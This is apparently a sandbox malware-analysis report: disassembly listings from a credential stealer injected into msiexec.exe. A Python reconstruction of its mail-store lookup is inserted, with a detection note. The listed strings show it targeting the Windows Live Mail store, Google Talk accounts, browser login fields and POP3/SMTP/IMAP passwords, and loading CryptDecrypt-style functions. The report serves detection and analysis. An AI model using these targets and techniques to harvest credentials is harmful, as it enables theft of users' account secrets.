Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID:
• API String ID: 3662548030-0
• Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
• Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
• Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
• Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                Strings
                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                • API String ID: 3203569119-2578778931
                                                                                                                                                • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
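Added example, not code from the sandbox report or from the sample: a Python reconstruction of the mail-store locator that the function above appears to implement, inferred only from its API sequence (memset, ExpandEnvironmentStringsA with a 0x104-byte buffer, strlen, _strcmpi) and its string references ("Store Root", "Software\Microsoft\Windows Live Mail", "\Microsoft\Windows Mail", "\Microsoft\Windows Live Mail"). The function names, the sample registry value, the sample environment and the exact order of the comparisons are assumptions; the report shows the calls and the strings, not the decompiled control flow.

```python
"""
Reconstruction (assumed logic, not decompiled code) of a Windows Live Mail
"Store Root" lookup: read the value under HKCU, expand %VAR% references the
way ExpandEnvironmentStringsA does, bound the result to MAX_PATH, and compare
the tail case-insensitively (_strcmpi) against the two default store suffixes.
Registry and environment are constructed stand-ins so this runs offline.
"""
import re

MAX_PATH = 0x104  # the 0x104 buffer length passed to ExpandEnvironmentStringsA

LIVE_MAIL_KEY = r"Software\Microsoft\Windows Live Mail"
STORE_ROOT_VALUE = "Store Root"
# Default store locations referenced by the function (compared with _strcmpi).
DEFAULT_STORE_SUFFIXES = (r"\Microsoft\Windows Mail", r"\Microsoft\Windows Live Mail")

# Constructed sample data (not taken from the report).
SAMPLE_REGISTRY = {
    LIVE_MAIL_KEY: {
        STORE_ROOT_VALUE: "%USERPROFILE%\\AppData\\Local\\Microsoft\\Windows Live Mail\\",
    },
}
SAMPLE_ENV = {
    "USERPROFILE": "C:\\Users\\alice",
    "LOCALAPPDATA": "C:\\Users\\alice\\AppData\\Local",
}


def expand_environment_strings(s, env):
    """Model ExpandEnvironmentStringsA: %NAME% is replaced from env (names are
    case-insensitive); a %NAME% that is not defined is left in place, which is
    what the real API does rather than dropping it."""
    upper_env = {k.upper(): v for k, v in env.items()}

    def repl(m):
        return upper_env.get(m.group(1).upper(), m.group(0))

    return re.sub(r"%([^%]+)%", repl, s)


def read_store_root(registry):
    """Return HKCU\\Software\\Microsoft\\Windows Live Mail\\Store Root, or None."""
    key = registry.get(LIVE_MAIL_KEY)
    if not key:
        return None
    return key.get(STORE_ROOT_VALUE)


def locate_mail_store(registry, env):
    """Return (expanded_store_path, is_default_location).

    (None, False) when the value is absent. The tail comparison is done the
    way _strcmpi would: case-insensitively, against each default suffix.
    """
    raw = read_store_root(registry)
    if raw is None:
        return None, False
    expanded = expand_environment_strings(raw, env)
    # ExpandEnvironmentStringsA reports the required size; a result that does
    # not fit the MAX_PATH buffer is treated as a failure here (assumption).
    if len(expanded) + 1 > MAX_PATH:
        raise ValueError("expanded Store Root does not fit in MAX_PATH buffer")
    path = expanded.rstrip("\\")
    is_default = any(path.lower().endswith(sfx.lower()) for sfx in DEFAULT_STORE_SUFFIXES)
    return path, is_default


if __name__ == "__main__":
    print(locate_mail_store(SAMPLE_REGISTRY, SAMPLE_ENV))
```

For detection the useful takeaway is the telemetry shape, not the string itself: a process that is not a mail client (here the payload lives in an injected msiexec.exe) reading HKCU\Software\Microsoft\Windows Live Mail\Store Root and then opening files under the expanded path is the sequence this function produces.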

                                                                                                                                                Control-flow Graph

Control-flow graph (function 0040CCD7-0040CDD9; graph image not reproduced): allocates twice with ??2@YAPAXI@Z (operator new), calls sub_404025, sub_407088 and sub_4019B5, then memset, LoadIconA and _mbscpy; DeleteObject is called on one branch (0040CD59-0040CD60).
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                Control-flow Graph

Control-flow graph (function 0040BA28-0040BB09; graph image not reproduced): loops over a comparison block that calls sub_407E20 and _mbsicmp (matching the /sort and /nosort strings listed below) and sub_40B5E5, then calls sub_406C62, one of sub_4107F1 / sub_404734 / sub_404785 / sub_403C16, and sub_407E30; the sort path ends in qsort, and both paths end in SetCursor.
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                                                                Control-flow Graph

Control-flow graph (function 0044B33B-0044B37B; graph image not reproduced): four conditionally executed ??3@YAXPAX@Z (operator delete) calls, one per guarded block.
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                                                                Control-flow Graph

Control-flow graph (function 00410DBB-00410E97; graph image not reproduced): calls sub_410D0E, sub_4070AE, memset, sub_410A9C, sub_410D3D, sub_410ADD and _mbscpy.
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 119022999-2036018995
                                                                                                                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                                                                Control-flow Graph

Control-flow graph (function 004085D2-004086DD; graph image not reproduced): calls sub_44B090, sub_4082CD and sub_410A9C, then memset and sub_410B62 in a loop with sub_410A9C, memset, sub_410ADD and sub_40848B on the inner path.
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
• memset.MSVCRT ref: 00408620
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00408671
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 3996936265-1079885057

Control-flow Graph: function 40ce70-40cf43 (graph rendering not recoverable from extraction)
APIs
  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
• _strcmpi.MSVCRT ref: 0040CEC3
Similarity
• API ID: strlen$_strcmpimemset
• String ID: /stext
• API String ID: 520177685-3817206916
APIs
  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
• LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
• GetProcAddress.KERNEL32(00000000,?), ref: 00404754
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
APIs
• GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
Similarity
• API ID: PrivateProfile$StringWrite_itoamemset
• String ID:
• API String ID: 4165544737-0
APIs
• FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
• GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
• GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
• GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
• GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
• GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
• GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
• GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-192783356
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,67CD7B60,?,00000000), ref: 00402533
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
